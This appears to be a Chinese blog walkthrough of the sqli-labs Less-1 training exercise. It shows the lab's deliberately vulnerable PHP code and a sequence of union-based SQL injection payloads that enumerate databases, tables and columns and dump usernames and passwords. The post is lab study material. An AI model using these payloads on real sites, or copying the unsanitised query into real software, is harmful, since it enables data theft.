sqli-labs第一关单引号字符型注入练习

Background -1 SQL注入基础知识
Less -1 基于错误的GET单引号字符型注入
手工注入:
代码审计:
检查完源码之后,我们发现这里传递参数的单引号出现了问题,我们可以尝试进行注入

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
// 接收前端传递过来的数据
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity

// 通过前端传递过来的 id 值进行拼接,使用SQL语句进行查询,此处考虑两个点, 一个是闭合前面你的 ' 另一个是处理后面的 ' , 一般采用两种思路, 闭合后面的引号或者注释掉, 注释掉采用--+ 或者 #(%23)
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// 检索user表中 id = 传递的参数 返回一条结果

// 将 $sql 传递过来的数据进行执行
$result=mysql_query($sql);

// 将数据库结果进行展示
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
// mysqli_error() 函数返回最近调用函数的最后一个错误描述。
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}

?>

# SQL 注入产生原因 :

Sql 语句为$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
id 参数在拼接 sql 语句时, 未对 id 进行任何的过滤等操作, 所以当提交 'or 1=1--+,
直接构造的 sql 语句就是SELECT * FROM users WHERE id='1'or 1=1--+ LIMIT 0,1
这条语句因 or 1=1 所以为永恒真。

方法一:手工 union 联合查询注入

# 出现报错信息,根据报错信息,可以确定输入参数的内容被存放到一对单引号中间:
?id=1'
根据上面代码审计的结果,咱们输入的1在数据库中出现的位置为:select ... from ... where id='1' ......

# 首先要用order by 子句猜解查询的字段数(二分法)。 [猜解查询字段数的原因:使用联合查询时,副查询字段数需要与主查询字段数一致,否则会报错。]

?id=1'order by 3 --+ 成功
?id=1'order by 4 --+ 失败

则说明有3个字段

首先判断是否存在注入,输入?id=1回显正常,输入?id=1'回显异常,这时判断为单引号字符型注入

 

 

 

 

 

 

# 通过联合查询(union)构造payload来获取数据库名 :
?id=-1'union select 1,2,3 --+

?id=-1'union select 1,2,database() --+
?id=-1'union select 1,database(),3 --+
?id=-1'union select database(),2,3 --+

?id=-1' union select 1,2,group_concat(schema_name)from information_schema.schemata--+  查询所有的数据库

---> "SELECT * FROM users WHERE id='-1'union select 1,2,database() LIMIT 0,1"

# 注:
为什么是-1呢?因为前面查询为假后面才能正常查询.
利用报错注入,union是联合查询,意思是俩个select查询结果合并,我们把左边的设置为空集那么右边的select查询自然成了第一行,这就是union select。

 

 

 

 

 

 ?id=-1' union select 1,2,group_concat(schema_name)from information_schema.schemata--+  查询所有的库

 

 

# 构造payload 来获取数据表
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+

# 注:
group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] ) 将相同的行组合起来
group_concat(table_name)
information_schema:结构用来存储数据库系统信息
information_schema.tables
SCHEMA_NAME(schema_name) 表示数据库名称
TABLE_SCHEMA(table_schema) 表示表所属的数据库名称;
TABLE_NAME(table_name) 表示所属的表的名称
COLUMN_NAME(column_name) 表示字段名

?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security'--+查询字段名

 

 

 

 

 

 表名查询完了,接着查询users表下的  用户名  密码

# 构造 payload 来获取字段名:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

 

 

# 构造 payload 来获取用户名账号和密码:
?id=-1' union select 1,2,group_concat(username,0x3a,password) from users--+

# 注:
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。

 

 

?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+  以波浪号进行分割用户名和密码:

 

 



posted @ 2022-08-16 10:07  晨起的太阳  阅读(157)  评论(0编辑  收藏  举报